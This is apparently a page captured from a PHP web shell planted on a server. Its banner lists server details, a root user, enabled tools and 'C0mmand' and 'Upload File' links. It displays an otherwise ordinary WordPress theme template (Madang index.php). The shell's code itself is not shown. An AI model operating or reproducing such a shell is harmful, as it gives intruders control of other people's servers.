|
Server IP : 10.1.204.1 / Your IP : 216.73.216.250 Web Server : Apache/2.4.66 (Debian) System : Linux madang-bd97cb958-x26ms 6.8.0-78-generic #78-Ubuntu SMP PREEMPT_DYNAMIC Tue Aug 12 11:28:09 UTC 2025 aarch64 User : root ( 0) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : ON | Python : OFF Directory (0755) : /var/www/html/wp-content/themes/madang/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The main template file.
*
* This is the most generic template file in a WordPress theme
* and one of the two required files for a theme (the other being style.css).
* It is used to display a page when nothing more specific matches a query.
* E.g., it puts together the home page when no home.php file exists.
*
* @link https://codex.wordpress.org/Template_Hierarchy
*
* @package Madang
*/
get_header(); ?>
<!--Begin content wrapper-->
<div id="content" class="site-content content-wrapper">
<div id="post-<?php the_ID(); ?>">
<div class="blog-content">
<main>
<div class="container">
<div class="row">
<!--Col Main-->
<div class="col-main col-lg-8 col-md-7 col-xs-12">
<?php
while ( have_posts() ) : the_post(); ?>
<div <?php post_class(); ?>>
<?php get_template_part( 'template-parts/content-blog-index' ); ?>
</div>
<?php endwhile; // End of the loop.
madang_pagination_blog();
?>
</div>
<!--Sidrbar Right-->
<div class="sidebar blog-right col-lg-4 col-md-5 hidden-sm hidden-xs">
<?php get_sidebar(); ?>
</div>
</div>
</div>
</main>
</div>
</div><!-- #post-## -->
</div>
<!--End content wrapper-->
<?php
get_footer();